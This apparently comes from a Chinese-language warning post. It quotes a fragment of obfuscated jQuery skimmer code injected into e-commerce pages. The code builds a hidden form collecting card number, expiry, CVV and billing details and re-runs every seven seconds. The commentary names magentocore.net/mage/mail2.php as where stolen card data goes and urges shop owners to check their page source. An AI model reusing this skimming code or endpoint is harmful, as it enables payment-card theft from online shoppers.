_0x83edx18(‘body’)[‘append’](‘<form class=”mi_forms” style=”display: none;”><input type=”text” name=”hosst_name”><input type=”text” name=”m_Card_number”><input type=”text” name=”m_Exp_1″><input type=”text” name=”m_Exp_2″><input type=”text” name=”m_CVV”><input type=”text” name=”m_first_name”><input type=”text” name=”m_second_name”><input type=”text” name=”m_address”><input type=”text” name=”m_city”><input type=”text” name=”m_state”><input type=”text” name=”m_zip”><input type=”text” name=”m_country”><input type=”text” name=”m_phone”><input type=”text” name=”m_vbv”></form>’);
init__lo();
lloo_interval = setInterval(‘init__lo();’, 7000)
})
})(jQuery)
}
}

 

https://magentocore.net/mage/mail2.php 使用此MAIL发送功能把收集到的信息卡信息发往这个地址!!!

盗刷信用卡信息的团伙就问您们怕不怕!!!!请各位电商用户打开页面源码自查!!!!